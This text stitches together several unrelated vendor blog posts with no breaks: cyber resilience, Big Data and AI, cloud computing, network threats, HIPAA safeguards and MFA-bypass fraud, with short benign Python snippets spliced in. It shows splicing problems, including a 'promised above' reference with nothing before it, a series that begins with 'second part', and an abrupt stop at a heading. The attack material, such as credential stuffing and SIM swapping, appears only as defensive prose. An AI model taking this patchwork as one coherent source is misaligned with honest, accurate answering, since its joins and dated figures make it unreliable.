Periodic assessments of the cyber resilience framework are necessary to measure its effectiveness and make necessary adjustments. This includes conducting regular security audits and penetration tests.
These evaluations help identify gaps and weaknesses in the resilience framework, ensuring continuous improvement and adaptation to new threats. You can use AMATAS penetration testing services to help you find the gaps in your cyber security.

Addressing Emerging Threats and Evolving Cyber Attack Techniques

Cyber threats are constantly evolving, making it essential for organizations to stay ahead of new challenges. This involves monitoring the threat landscape, updating security measures, and adopting innovative technologies to counteract emerging threats. Proactive adaptation and flexibility are key to maintaining a robust defense against sophisticated cyber attacks.

Integration of Cyber Resilience into the Organization's Culture

Embedding cyber resilience principles deeply within the organizational culture enhances overall security awareness and response. This includes fostering a culture of continuous learning, encouraging cybersecurity best practices, and ensuring that all employees understand their role in maintaining cyber resilience. A security-conscious culture helps in building a strong, cyber-resilient organization.

In an era where cyber threats are increasingly sophisticated and prevalent, developing a successful cyber resilience strategy is more crucial than ever. This strategy is not merely about protecting against attacks but also about ensuring that an organization can continue to operate, even in the face of adversity. The components underpinning cyber resilience – such as having an effective incident response plan, conducting regular security training, and performing vulnerability tests – are essential for mitigating risks. By aligning these efforts with business goals, organizations can turn cyber resilience into a competitive advantage, ensuring long-term security and stakeholder trust.

Build Cyber Resilience with AMATAS

AMATAS can help you build and implement a comprehensive cyber resilience framework tailored to your needs. Are you in need of a trusted cybersecurity partner? Contact us, and let's discuss how we can help you protect your organization, achieve cyber resilience, and enhance your business resilience against cyber threats!

What Are the Latest Trends in Cybersecurity?

Cybersecurity is a dynamic industry, mainly because the threats evolve daily. Some of the most trending (though not necessarily the most effective) infosec technologies include artificial intelligence (AI) and blockchain. There is also an increased focus on cloud security, zero trust architecture, and the growing importance of securing Internet of Things (IoT) devices.

What Are the Three Critical Components of Cyber Resilience?

The three critical components of cyber resilience are risk mitigation, incident response and recovery, and business continuity. Risk mitigation involves identifying and managing potential threats, the incident response plan focuses on effectively handling and recovering from cyber incidents, and business continuity ensures that critical operations can continue without significant disruption.

What Makes a Good Cybersecurity Strategy?

A successful cybersecurity strategy includes a thorough risk assessment, robust incident response plans, continuous monitoring and improvement, and regular employee training. It should align with business objectives, ensure compliance with regulations, and incorporate employee awareness programs.
Additionally, leveraging advanced technologies like AI and maintaining a proactive approach to emerging threats are essential.
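As promised above, here is a toy sketch of the likelihood-times-impact scoring used to assess and prioritize risks. The five-point scales, risk names, and scores are all hypothetical; real programs apply structured frameworks such as the NIST Cybersecurity Framework rather than a ten-line script, but the prioritization logic is the same.

```python
from dataclasses import dataclass

@dataclass
class Risk:
    name: str
    likelihood: int  # 1 (rare) .. 5 (almost certain) -- hypothetical scale
    impact: int      # 1 (negligible) .. 5 (severe)

    @property
    def score(self) -> int:
        # Classic risk-matrix scoring: likelihood x impact.
        return self.likelihood * self.impact

# Hypothetical risk register entries.
register = [
    Risk("Ransomware on file servers", likelihood=4, impact=5),
    Risk("Phishing-led credential theft", likelihood=5, impact=4),
    Risk("Insider data exfiltration", likelihood=2, impact=5),
]

# Highest-scoring risks receive remediation resources first.
for risk in sorted(register, key=lambda r: r.score, reverse=True):
    print(f"{risk.score:>2}  {risk.name}")
```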
This is the second part of the series. You can read the first part of the article here.

Back in the 80s, we marveled at technologies like those shown in Back to the Future. We hoped for the day when we could have our own hoverboards, biometric devices, and headsets that could receive calls and let you watch TV. Today, technology has given us these and more. Aside from hoverboards, biometric devices, gaming headsets, and other wearables, we now also have consumer drones, video calls, Xbox Kinect and other hands-free gaming systems, and tablets like the iPad. Our technology at present is so advanced that it has become common to suggest or expect even the most unexpected devices to come out in the market.

Two of the most talked-about advanced technologies are Big Data and Artificial Intelligence (AI). And when we talk about these two, the concept of "Deep Learning" is never far behind.

Big Data sounds like such a big word that it often comes across as intimidating – like it's some complex idea that's difficult to grasp, at least if you are not a technical person. While Big Data can be powerful, it is not at all what you perceive it to be. Its concept is actually quite simple: it is a collection of data taken from different traditional and digital sources. It is a new method of storing, managing, and manipulating data. All data collected and stored come from internal and external sectors of a company or an organization. Big Data is, more often than not, intended for analysis and discovery, and is useful in making more accurate predictions and decisions. For example, a company selling a new product wants to know if its regular customers will like it. It can use Big Data to collect information regarding customer preferences and buying attitudes to come up with a decision.

If you want to know what Big Data looks like, just imagine a huge warehouse with stacks and stacks of products. Actually, this was what Big Data was all about in the old days: large data warehouses equipped with business intelligence solutions that could be used for reporting. What we have today is similar to this, but there's no physical address or location – and all processes are done in real time.

Big Data has worked wonders for many organizations because it has made them more "intelligent". When we talk about someone or something being intelligent, one of the first technology outputs that comes to mind is Artificial Intelligence. Although it has been around for years, AI, or machine learning, has never made as major an impact as it is creating nowadays. Simply put, Artificial Intelligence is all about making computers behave like humans. AI is a term that was coined by John McCarthy back in 1955. Several areas of specialization are connected to AI, including expert systems (computers programmed to come up with decisions in real-life situations), natural language (computers programmed to understand human languages), and game playing (computers programmed to play games against humans). Siri on your iPhone is a good example of AI. So is Google Now, Google's personal assistant.

The Relationship of Big Data and AI

The information that you collect from Big Data is used to understand customers and help you come up with a strategy for satisfying them, by giving them what they need and want. However, this can sometimes fall short, and you will have to find a way to understand complex analysis. This is where Artificial Intelligence comes in. AI can perform tasks faster than humans. Because of AI, machines can think and act like humans.
Therefore, tasks are performed better and in a more efficient manner, and information can be processed in the fastest time possible. Coupled with deep learning, Artificial Intelligence can prove to be a major factor in Big Data networks. Deep learning is a technology that trains machines to classify, recognize, and categorize data patterns by simulating a "brain": a neural network that leverages massive amounts of data to solve difficult or complicated tasks. Some good examples of deep learning are Google Brain and DeepMind.

Big Data, Artificial Intelligence and Deep Learning are Interconnected

AI can assist deep learning through unsupervised data. These data are fed to the machine, and on its own, it will find a way to do the tasks that have to be done. Thus, we do not need to tell it what it should do. This symbiosis can result in a lot of positive changes, particularly in terms of inventions. However, this will entail a lot of work for our machines. They will need to go beyond what they already have, beyond the data. This can be done, but at this point, much has to be improved in Artificial Intelligence.

AI technology is already remarkable as it is. But if we want to reach the level where we can go far beyond controlling driverless cars or enjoying the conveniences of having a home robot, we need to aim for more. As it is, there is a limit to the data instilled in today's AI. Home robots can only do so much. Our driverless cars can only function to a limit. Thus, we need to push some more and go beyond what we already have in our hands.

Geometric Intelligence founder and CEO Gary Marcus believes that it is important to bring the ultimate AI to the table. This means combining the best of what people can do with the best of what machines are able to do. However, to achieve this, we need to go back to the basics, and that is psychology. We need to find the time to study ourselves, human beings. This will help us reach a deeper understanding of humans, which we can then use to formulate and develop Marcus' ideal AI.

Despite the fact that a lot can still be improved and new technologies can still be developed, Artificial Intelligence and Big Data are essential in a highly technological world like ours. We don't need Marty McFly to tell us this. We only need to see all the developments cropping up one after the other. After hoverboards, home robots, flying drones, and wearable technology, we're bound to see more. We just need to give the ultimate AI a little more time to take off.

Photo courtesy of A Health Blog.
The basic idea behind cloud computing and virtualization is twofold. On the surface, it entails taking IT services that are normally on-site, such as data storage or web servers, and moving them onto third-party servers that are accessible from anywhere over the Internet. Amazon Web Services (AWS) is a fine example of this: thousands of highly successful websites are hosted by Amazon rather than by the companies that own them, because Amazon has a more robust and stable platform.

The other main aspect of cloud computing and virtualization is conceptual: it redefines IT as a service rather than an infrastructure investment. Activities such as data storage, which traditionally involve expensive purchases of servers and people to maintain them, can now be considered an on-demand service. A company pays for X terabytes of storage and data transfer, and if it needs more, it simply calls up the provider and asks for it (a short provisioning sketch appears at the end of this post).

From a business perspective, there are numerous benefits to this shift towards a cloud-based infrastructure. Among these are:
- It is almost always cheaper than on-site solutions, although often not by as much as some cloud proponents claim.
- It frees up internal resources to deal with your business's core competencies, by shifting the IT burden onto a third party.
- Because cloud services can be accessed through any Internet-connected device, it becomes far easier to integrate new technologies, such as smartphones and tablets, into the system regardless of platform.
- For businesses with end-user software, the customers also benefit from this universal access.
- Businesses can become much more flexible with their computing needs and demands. Future-proofing is also simplified.

In short, cloud computing and virtualization services are growing at an astounding rate. According to a recent survey, over 60% of servers will be virtual by 2014. Cloud computing is a rising tide, and one that businesses are finding hard to ignore. The overall benefits to efficiency and to the TCO of their IT operations are simply too significant to overlook.
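To illustrate the storage-as-a-service idea referenced above, here is a minimal sketch that provisions object storage on demand with Amazon's boto3 SDK. The bucket name, file names, and region are hypothetical placeholders, and a real deployment would add credentials management, error handling, and lifecycle policies.

```python
import boto3

# Hypothetical bucket name and region -- substitute your own.
BUCKET, REGION = "acme-archive-2024", "us-east-1"

s3 = boto3.client("s3", region_name=REGION)

# "Calling up the provider for more storage" becomes a single API call:
# object storage grows with whatever you upload, billed on demand.
s3.create_bucket(Bucket=BUCKET)
s3.upload_file("backup.tar.gz", BUCKET, "backups/backup.tar.gz")

# Verify the object landed.
listing = s3.list_objects_v2(Bucket=BUCKET, Prefix="backups/")
for obj in listing.get("Contents", []):
    print(obj["Key"], obj["Size"])
```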
Modern organizations face a wide and constantly changing range of network security threats, and security leaders must continually update their security posture against them. As threat actors change their tactics, techniques, and procedures, exploit new vulnerabilities, and deploy new technologies to support their activities, it's up to security teams to respond by equipping themselves with solutions that address the latest threats.

The arms race between cybersecurity professionals and cybercriminals is ongoing. During the COVID-19 pandemic, high-profile ransomware attacks took the industry by storm. When enterprise security teams responded by implementing secure backup functionality and endpoint detection and response, cybercriminals shifted towards double extortion attacks. The cybercrime industry constantly invests in new capabilities to help hackers breach computer networks and gain access to sensitive data. Security professionals must familiarize themselves with the latest network security threats and deploy modern solutions that address them.

What are the Biggest Network Security Threats?

1. Malware-based Cyberattacks

Malware deserves a category of its own because so many high-profile attacks rely on malicious software to work. These include everything from the Colonial Pipeline ransomware attack to historical events like Stuxnet. Broadly speaking, cyberattacks that rely on launching malicious software on computer systems are part of this category. There are many different types of malware-based cyberattacks, and they vary widely in scope and capability. Some examples include:

Viruses. Malware that replicates itself by inserting its own code into other applications. Viruses can spread across devices and networks very quickly.

Ransomware. This type of malware focuses on finding and encrypting critical data on the victim's network and then demanding payment for the decryption key. Cybercriminals typically demand payment in the form of cryptocurrency, and have developed a sophisticated industrial ecosystem for conducting ransomware attacks.

Spyware. This category includes malware variants designed to gather information on victims and send it to a third party without consent. Sometimes cybercriminals do this as part of a more elaborate cyberattack; other times it's part of a corporate espionage plan. Some spyware variants collect sensitive information that cybercriminals value highly.

Trojans. These are malicious applications disguised as legitimate ones. Hackers may hide malicious code inside legitimate software in order to trick users into becoming victims of the attack. Trojans are commonly delivered as an email attachment or free-to-download file that launches its malicious payload after being opened in the victim's environment.

Fileless Malware. This type of malware leverages legitimate tools native to the IT environment to launch an attack. The technique is also called "living off the land" because hackers can exploit applications and operating systems from the inside, without having to download additional payloads and get them past firewalls.

2. Network-Based Attacks

These are attacks that try to impact network assets or functionality, often through technical exploitation. Network-based attacks typically start at the edge of the network, where it sends and receives traffic to the public internet.

Distributed Denial-of-Service (DDoS) Attacks.
These attacks overwhelm network resources, leading to downtime, service unavailability, and in some cases data loss. To launch DDoS attacks, cybercriminals must gain control over a large number of compromised devices and turn them into bots. Once thousands (or millions) of bots using unique IP addresses request server resources, the server breaks down and stops functioning.

Man-in-the-Middle (MitM) Attacks. These attacks let cybercriminals eavesdrop on communications between two parties. In some cases, they can also alter the communications between both parties, allowing them to plan and execute more complex attacks. Many different types of man-in-the-middle attacks exist, including IP spoofing, DNS spoofing, SSL stripping, and others.

3. Social Engineering and Phishing

These attacks are not necessarily technical exploits. They focus more on abusing the trust that human beings have in one another. Usually, they involve the attacker impersonating someone in order to convince the victim to give up sensitive data or grant access to a secure asset.

Phishing Attacks. This is when hackers create fake messages telling victims to take some kind of action that benefits the attacker. These deceptive messages can result in the theft of login credentials, credit card information, or more. Major institutions, like the IRS, are regularly impersonated by hackers running phishing scams.

Social Engineering Attacks. These attacks use psychological manipulation to trick victims into divulging confidential information. A common example might be a hacker contacting a company posing as a third-party technology vendor and asking for access to a secure system, or impersonating the company CEO and demanding that an employee pay a fictitious invoice.

4. Insider Threats and Unauthorized Access

These network security threats are particularly dangerous because they are very difficult to catch. Most traditional security tools are not configured to detect malicious insiders, who generally have permission to access sensitive data and assets.

Insider Threats. Employees, associates, and partners with access to sensitive data may represent severe security risks. If an authorized user decides to steal data and sell it to a hacker or competitor, you may not be able to detect the attack using traditional security tools. That is what makes insider threats so dangerous: they are often effectively undetectable.

Unauthorized Access. This includes a broad range of methods used to gain illegal access to networks or systems, usually to steal data or alter it in some way. Attackers may use credential-stuffing attacks to access sensitive networks, or they can try brute-force methods that involve automatically testing millions of username and password combinations until they get the right one. This often works because people reuse passwords that are easy to remember.

Solutions to Network Security Threats

Each of the security threats listed above comes with a unique set of risks and impacts organizations in a unique way. There is no one-size-fits-all solution to navigating these risks. Every organization has to develop a cybersecurity policy that meets its specific needs. However, the most secure organizations usually share the following characteristics.

Fundamental Security Measures

Well-configured Firewalls. Firewalls control incoming and outgoing network traffic based on security rules.
These rules can deny unauthorized traffic attempting to connect with sensitive network assets and block sensitive information from traveling outside the network. In each case, robust configuration is key to making the most of your firewall deployment. Choosing a firewall security solution like AlgoSec can dramatically improve your defenses against complex network threats.

Anti-malware and Antivirus Software. These solutions detect and remove malicious software throughout the network. They run continuously, adapting their automated scans to include the latest threat detection signatures so they can block malicious activity before it leads to business disruption. Since these tools typically rely on threat signatures, they cannot catch zero-day attacks that leverage unknown vulnerabilities.

Advanced Protection Tools

Intrusion Prevention Systems. These security tools monitor network traffic for behavior that suggests unauthorized activity. When they find evidence of cyberattacks and security breaches, they launch automated responses that block malicious activity and remove unauthorized users from the network.

Network Segmentation. This is the process of dividing networks into smaller segments to control access and reduce the attack surface. Highly segmented networks are harder to compromise because hackers have to repeatedly pass authentication checks to move from one network zone to another. This increases the chance that they fail, or that they generate activity unusual enough to trigger an alert.

Security Information and Event Management (SIEM) platforms. These solutions give security analysts complete visibility into network and application activity across the IT environment. They capture and analyze log data from firewalls, endpoint devices, and other assets and correlate it so that security teams can quickly detect and respond to unauthorized activity, especially insider threats.

Endpoint Detection and Response (EDR). These solutions provide real-time visibility into the activities of endpoint devices like laptops, desktops, and mobile phones. They monitor these devices for threat indicators and automatically respond to identified threats before they can reach the rest of the network. More advanced Extended Detection and Response (XDR) solutions draw additional context and data from third-party security tools and provide in-depth automation.

Authentication and Access Control

Multi-Factor Authentication (MFA). This technology enhances security by requiring users to submit multiple forms of verification before accessing sensitive data. This makes it useful against phishing attacks, social engineering, and insider threats, because hackers need more than just a password to gain entry to secure networks. MFA also plays an important role in Zero Trust architecture.

Strong Passwords and Access Policies. There is no replacement for strong password policies and securely controlling user access to sensitive data. Security teams should pay close attention to password policy compliance, making sure employees do not reuse passwords across accounts and avoid simple memory hacks like adding sequential numbers to existing passwords.

Preventing Social Engineering and Phishing

While SIEM platforms, MFA policies, and strong passwords go a long way towards preventing social engineering and phishing attacks, there are a few additional security measures worth taking to reduce these risks:

Security Awareness Training.
Leverage a corporate training LMS to educate employees about phishing and social engineering tactics. Phishing simulation exercises can help teach employees how to distinguish phishing messages from legitimate ones, and pinpoint the users at highest risk of falling for a phishing scam.

Email Filtering and Verification. Email security tools can identify and block phishing emails before they arrive in the inbox. They often rely on scanning the reputation of the servers that send incoming emails, and can detect discrepancies in email metadata that suggest malicious intent. Even if these solutions generally can't keep 100% of malicious emails out of the inbox, they significantly reduce email-related threat risks.

Dealing with DDoS and MitM Attacks

These technical exploits can lead to significant business disruption, especially when undertaken by large-scale threat actors with access to significant resources. Your firewall configuration and VPN policies will make the biggest difference here:

DDoS Prevention Systems. Protect against distributed denial-of-service attacks by implementing third-party DDoS prevention solutions, deploying advanced firewall configurations, and using load balancers. Some next-generation firewalls (NGFWs) can increase protection against DDoS attacks by acting as a handshake proxy and dropping connection requests that do not complete the TCP handshake process.

VPNs and Encryption. VPNs provide secure communication channels that prevent MitM attacks and data eavesdropping. Encrypted traffic can only be intercepted by attackers who go through the extra step of obtaining the appropriate decryption key. This makes it much less likely that they will focus on your organization instead of less secure ones that are easier to target.

Addressing Insider Threats

Insider threats are a complex security issue that requires deep, multi-layered solutions to address. This is especially true when malicious insiders are employees with legitimate user credentials and privileges.

Behavioral Auditing and Monitoring. Regular assessments and monitoring of user activities and network traffic are vital for detecting insider threats. Security teams need to look beyond traditional security deployments and gain insight into user behaviors in order to catch authorized users doing suspicious things like escalating their privileges or accessing sensitive data they do not normally access.

Zero Trust Security Model. Assume no user or device is trustworthy until verified. Multiple layers of verification between highly segmented networks — with multi-factor authentication steps at each layer — can make it much harder for insider threats to steal data and conduct cyberattacks.

Implementing a Robust Security Strategy

Directly addressing known threats should be just one part of your cybersecurity strategy. To fully protect your network and assets from unknown risks, you must also build a strong security posture that can address risks associated with new and emerging cyber threats.

Continual Assessment and Improvement

The security threat landscape is constantly changing, and your security posture must adapt in response. It's not always easy to determine exactly how your security posture should change, which is why forward-thinking security leaders periodically invest in vulnerability assessments designed to identify security weaknesses that may have been overlooked.
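As a toy illustration of the discovery step in such an assessment, the sketch below probes a handful of well-known TCP ports on a host you are authorized to test. It is an assumption-laden stand-in for real scanners such as Nmap or a managed vulnerability assessment service: the target address is a placeholder, and an open port is only a lead, not a confirmed weakness.

```python
import socket

# A few commonly exposed services to check -- hypothetical shortlist.
COMMON_PORTS = {21: "ftp", 22: "ssh", 23: "telnet", 80: "http", 443: "https", 3389: "rdp"}

def scan_host(host: str, timeout: float = 0.5) -> list[str]:
    """Return findings for ports that accept a TCP connection."""
    findings = []
    for port, service in COMMON_PORTS.items():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the handshake succeeded
                findings.append(f"{host}:{port} ({service}) is reachable")
    return findings

if __name__ == "__main__":
    for finding in scan_host("192.0.2.10"):  # hypothetical in-scope host
        print(finding)
```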
Once you have a list of security weaknesses to address, you can begin proactively remediating them by configuring your security tech stack and developing new incident response playbooks. These playbooks help you establish a coordinated, standardized response to security incidents and data breaches before they occur.

Integration of Security Tools

Coordinating incident response plans isn't easy when every tool in your tech stack has its own user interface and access control permissions. You may need to integrate your security tools into a single platform that allows security teams to address issues across your entire network from a single point of reference. This will help you isolate and address security issues on IoT and mobile devices without having to dedicate a particular team member exclusively to that responsibility. If a cyberattack targeting mobile apps occurs, your incident response plan won't be limited by the bottleneck of having a single person with sufficient access to address it.

Similarly, highly integrated security tools that leverage machine learning and automation can enhance the scalability of incident response and speed up response processes significantly. Certain incident response playbooks can be automated entirely, providing near-real-time protection against sophisticated threats and freeing your team to focus on higher-impact strategic initiatives.

Developing and Enforcing Security Policies

Developing and enforcing security policies is one of the high-impact strategic tasks your security team should dedicate a great deal of time and effort towards. Since the cybersecurity threat landscape is constantly changing, you must commit to adapting your policies quickly in response to new and emerging threats. That means developing a security policy framework that covers all aspects of network and data security. Similarly, you can pursue compliance with regulatory standards that ensure predictable outcomes from security incidents. Achieving compliance with standards like NIST, CMMC, PCI-DSS, and HIPAA can help you earn customers' trust and open up new business opportunities.

AlgoSec: Your Partner in Network Security

Protecting against network threats requires continuous vigilance and the ability to adapt to fast-moving changes in the security landscape. Every level of your organization must be engaged in security awareness and empowered to report potential security incidents. Policy management and visibility platforms like AlgoSec can help you gain control over your security tool configurations. This enhances the value of continuous vigilance and improvement, and boosts the speed and accuracy of policy updates using automation. Consider making AlgoSec your preferred security policy automation and visibility platform.
The Health Insurance Portability and Accountability Act (HIPAA) passed in 1996. Its purpose is to regulate how healthcare entities use and disclose Protected Health Information (PHI). HIPAA Technical Safeguards are in place to keep private information properly protected; without these guidelines, PHI can fall into the wrong hands. This blog focuses on specific aspects of the Security Rule and how HIPAA Technical Safeguards keep your information secure.

The HIPAA Security Rule

There are three general rules outlined under HIPAA: the Privacy Rule, the Security Rule, and the Breach Notification Rule. Each one serves a unique purpose in regard to safeguarding PHI. The Security Rule requires implementation specifications, such as security software and/or procedural access controls, that uphold the integrity of PHI.

The Privacy Rule

The Privacy Rule protects the confidentiality and integrity of a patient's private medical information. It advocates for patients' rights by regulating who can access PHI and under what circumstances it can be disclosed.

The Security Rule

The Security Rule specifically focuses on safeguarding Electronic Protected Health Information (ePHI). It establishes security standards HIPAA covered entities must implement and maintain to keep electronic health records secure.

The Breach Notification Rule

The Breach Notification Rule requires that a Covered Entity (CE) and its Business Associates (BAs) properly notify affected individuals in the event of a data breach. This rule only applies if there has been a compromise of improperly secured health information.

What Are Technical Safeguards?

Under HIPAA's Security Rule, there are Physical, Administrative, and Technical Safeguards. HIPAA recommends safeguards such as integrity controls, unique user identification, risk analysis, and hiring security personnel to record and examine activity. These security standards are a guide for HIPAA covered entities that handle PHI regularly. This means that while covered entities are not required to implement every single one of these policies, the policies are highly recommended and upheld as best data security practice.

Physical Safeguards are designed to protect the building where tangible assets and resources are stored. The size of the facility or organization determines the scope and stringency of the enforced Physical Safeguards.

Administrative Safeguards, on the other hand, pertain to office staff in the workplace where PHI is stored. These policies and procedures ensure that employers properly train and educate employees in regard to handling PHI. If PHI is altered or destroyed, for example, the office staff should know how to properly dispose of it.

Finally, Technical Safeguards, as mentioned above, apply exclusively to ePHI. Technical Safeguards are in place to ensure the technology that hosts ePHI is properly secured. Data encryption and decryption, for instance, is a great way to secure ePHI sent via email, because it makes the data unreadable to a hacker who may be trying to infiltrate your inbox. HIPAA Technical Safeguards are not meant to make navigating technology more difficult. Rather, they represent good business practices for HIPAA covered entities through reasonable and appropriate technology solutions.

Technical Safeguards Examples

HIPAA law does not require a CE to follow any specific set of Technical Safeguards to remain compliant. The CE has discretion over the security methodology it feels is right for its organization.
However, the law does require that the security methods they choose be both reasonable and appropriate. Some examples of Technical Safeguards under HIPAA's Security Rule include:
- Data Encryption (a minimal encryption sketch appears at the end of this post)
- Multi-Factor Authentication
- Strong Log-On Credentials or Passwords
- Private DNS Servers
- Systems to Track and Monitor ePHI Access

What is the Purpose of Technical Security Safeguards?

After reading this information about HIPAA Technical Safeguards, you may be wondering, "Why does this matter to me?" Business owners and healthcare professionals should protect their patients' health data at all costs. Technical Safeguards were written to guide HIPAA covered entities toward the best practices and policies to achieve this goal. HIPAA compliance avoids legal penalties and builds trust with patients.

If you are a CE or third-party BA, you probably deal with sensitive information often. You could be emailing medical records to a colleague or messaging a patient. Regardless, HIPAA covered entities should place a high priority on protecting their ePHI. As such, it is extremely important to implement proper security measures to safeguard this data. If a CE does not properly safeguard data, it faces a high risk of a data breach. When unauthorized personnel access PHI, they can use it to exploit you and your patients.

Secure Your ePHI with EnGuard®!

At Enterprise Guardian, data security is our top priority. That is why we've integrated HIPAA Technical Safeguards into our lines of service. As certified HIPAA security experts, we understand how important it is to keep private information properly safeguarded. Technical Safeguards such as data encryption, private DNS servers, and more are an integral part of our security services, because we firmly believe in our ethical responsibility to uphold the integrity of your private data. To learn more, check our pricing page for a suitable plan that meets your needs!
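To ground the first safeguard on that list, here is a minimal sketch of symmetric encryption with the Python cryptography library's Fernet interface. The record content is a hypothetical placeholder, and a real ePHI system would also need managed key storage, access controls, and audit logging to satisfy the Security Rule.

```python
from cryptography.fernet import Fernet

# In practice the key lives in a key management system, never in code.
key = Fernet.generate_key()
cipher = Fernet(key)

# Hypothetical ePHI payload to protect before transmission or storage.
record = b"Patient: Jane Doe | MRN 000000 | Lab result: pending"

token = cipher.encrypt(record)    # unreadable without the key
print(token[:40], b"...")

restored = cipher.decrypt(token)  # only systems holding the key can do this
assert restored == record
```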
How Fraudsters Bypass MFA to Get into Banks, Brokers and Crypto Wallets

Passwords are dying as a sole security measure, particularly within financial services. It is widely expected (and in the UK, mandatory) that any institution responsible for finances, from banks to brokers and even crypto wallets, should implement multi-factor authentication (MFA) to prevent fraudsters gaining access to accounts using automated attacks, even if they know the user's password. This blog post outlines several MFA bypass techniques attackers have developed to carry out account takeover attacks on financial services organizations.

What is MFA (multi-factor authentication)?

MFA, or multi-factor authentication, is a security measure designed to prevent unauthorized access to accounts, even when the attacker has the user's password. Any login requires an MFA access code (like a one-time password) generated on a device belonging to the account owner using a third-party MFA provider app like Google Authenticator or Authy. In theory, only the account owner can access the code and log in, even if their credentials are compromised by a bad actor.

2FA (two-factor authentication) is a type of MFA that uses exactly two factors for login (usually credentials plus a device). The second factor could be a code sent via a text message or to an app. All 2FA is a form of MFA, but not all MFA is two-factor authentication, as more factors could be required.

How is cryptocurrency stolen?

The nature of blockchain currencies makes them highly susceptible to fraudulent activity. Transactions are difficult if not impossible to trace, making it easy for adversaries to get away with stealing large amounts of virtual cash undetected. Between October 2020 and March 2021, 7,000 people reported a collective $80 million stolen in cryptocurrency – 12 times as many reports as in the same period the previous year, with over 1,000% more money stolen. Here are some of the most prevalent types of cryptocurrency fraud:

Guru cons and investment scams

As people are drawn into the hype around making money through crypto investments, so-called "crypto gurus" have inevitably found a niche selling advice to newcomers. Sadly, fraudsters have taken advantage of the situation. In one scam, more than $2 million was stolen by fraudsters impersonating cryptocurrency advocate Elon Musk. These con artists promised to multiply the victims' investments, but instead stole the money with no hope of retrieval.

Romance scams

The difficulty in tracing transactions makes cryptocurrency a perfect tool for romance scammers who manipulate their victims into transferring huge sums of cash. The FTC reports that over $185 million has been lost via cryptocurrency transactions in romance scams since 2021 – one in every three dollars lost to the scams overall.

Wallet fraud

Unlike traditional banking, crypto transactions are hard to reverse or trace. There is little support due to the decentralized nature of the currencies; password recovery mechanisms are less robust than at traditional banks, and recovering stolen accounts is harder, as proving yourself to be the legitimate account owner is not straightforward. These factors make cryptocurrency wallet fraud attractive to ATO attackers: risk and cost are low, but potential rewards are extremely high.

Account takeover is still a major concern in financial services

Account takeover (ATO) is the holy grail of fraud attacks in financial services, handing criminals their victims' financial assets on a platter.
The risk of accounts being stolen affects traditional banks as well as FinTechs and crypto wallets. The first step in most attempts to gain access to bank accounts is credential stuffing. MFA is a way to stop attacks like credential stuffing.

How can credential stuffing give access to a user's account?

First, the attacker acquires a list of credentials (username and password pairs), usually through some form of credential theft. This could be a data leak from another site published on the dark web, or 'botnetted' device fingerprints and session cookies bought from marketplaces like the Genesis Market. If only partial credentials are obtained, attackers can use brute force to guess the password based on published lists.

Next, threat actors inject these credentials into the login pages of a targeted company to determine which ones are legitimate. This is usually done at great velocity and volume using bots to automate the process. Some attacks make millions of login attempts within just a few hours, so even a small success rate at this scale can yield hundreds or thousands of accounts, which is a big win for criminals. Any validated credentials can then be used for an account takeover attack. Once in, threat actors can access sensitive data, perform a password reset, and completely control the user account, even transferring money elsewhere.

How to protect your crypto wallet from thieves

In cryptocurrency terms, your wallet's private key is your money, so anyone who has access to it essentially has access to your funds. Private keys are frequently encrypted with a password, so keeping both safe is essential. Here are a few precautions to consider for securing your cryptocurrency.

Use multi-factor authentication via an app

Multi-factor authentication (MFA) is an additional step to protect accounts that may have their passwords compromised, adding an extra hoop for criminals to jump through. However, with an attractive reward inside your crypto wallet, there are ways around SMS verification as a form of MFA. If an adversary knows your phone number along with other PII to get past security questions (often obtained through social engineering), they can fool your mobile network provider over the phone in an attack called phone porting. The network is persuaded to swap the victim's SIM card to another phone, allowing the attacker to receive SMS verification codes and clear MFA. The solution is to use dedicated authenticator apps like Google Authenticator or Authy instead of just a phone number as the second factor (a toy sketch of how these app-generated codes work appears below).

Use a strong, unique password, or even separate email addresses for each wallet

If an attacker gains access to one account, quite often they can access other accounts owned by the same person, because many people reuse the same passwords. This is unsurprising, since the average person has 191 passwords to remember for their online accounts. The way to protect against this is to always use a strong, unique password for every service. Password managers are an essential tool for this purpose, generating only strong passwords and keeping them safe behind one master password. You must be extremely careful with any password storage you rely on, as there is no way to recover lost passwords for crypto wallets due to the decentralized nature of cryptocurrency. You might also want to create a totally separate email address for each crypto wallet, so there is even less risk of losing access to your whole balance should one service be compromised.
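As referenced above, here is a toy sketch of the time-based one-time password (TOTP) scheme that apps like Google Authenticator and Authy implement, using the pyotp library. The shared secret here is generated on the fly for demonstration; in a real enrollment it is exchanged once (typically via a QR code) and stored by both the app and the service.

```python
import pyotp

# One-time enrollment: the service and the authenticator app share this secret.
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)  # 6-digit codes rotating every 30 seconds by default

# What the authenticator app displays right now.
code = totp.now()
print("Current code:", code)

# What the service does at login: check the submitted code against the same
# secret and time window. A stolen password alone cannot pass this check.
print("Valid?", totp.verify(code))
print("Forged code accepted?", totp.verify("000000"))  # almost certainly False
```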
Protect your private key with cold storage

Your public key is like an address others use to transfer money to your account, while you need your private key to send money to others. It's essential to keep your private key away from prying eyes, and cold storage is one way to achieve this. Cold storage of a private key involves physically writing down the key on a piece of paper, locking it away in a safe or deposit box, and erasing all digital traces of it. Just be extremely careful not to put this physical copy anywhere it can be lost, destroyed, or stolen.

Use a hardware wallet

A similar tactic to cold storage of your private key is using a hardware (or cold) wallet. These are physical devices onto which cryptocurrency can be transferred and which are then kept offline, like withdrawing cash from an ATM and keeping it in a traditional wallet. The advantage of doing this is that it keeps your balance offline and safe from being withdrawn remotely by anyone else. But, as with a traditional wallet, theft is always possible, and if the device is lost, the funds on it will be irretrievable.

How can multi-factor authentication stop credential stuffing and account takeover?

MFA is designed to stop ATO attacks by requiring more than just a password (usually something in the account owner's physical possession) to validate a login, preventing automated attempts. Unfortunately, attackers can bypass MFA security using a combination of bot and human intervention, either by sidestepping the need to use MFA for account access or by using clever tricks to fool account owners into handing over MFA codes.

How do attackers bypass MFA?

Here are some common MFA bypass attack vectors:

Financial aggregator sites

APIs are a huge target for financial fraudsters, as the adoption of Open Banking APIs to meet PSD2 requirements opened a new attack vector. APIs are exploitable via financial aggregator sites. Bank customers use services such as Mint, Plaid, and Yodlee to manage their finances, aggregating accounts into a 'single pane of glass' view. These apps can access account information and even make changes using the bank's API or a web app, sometimes without requiring MFA. A threat actor can perform credential stuffing attacks through a third-party financial aggregator app to bypass MFA controls.

Security questions and social engineering

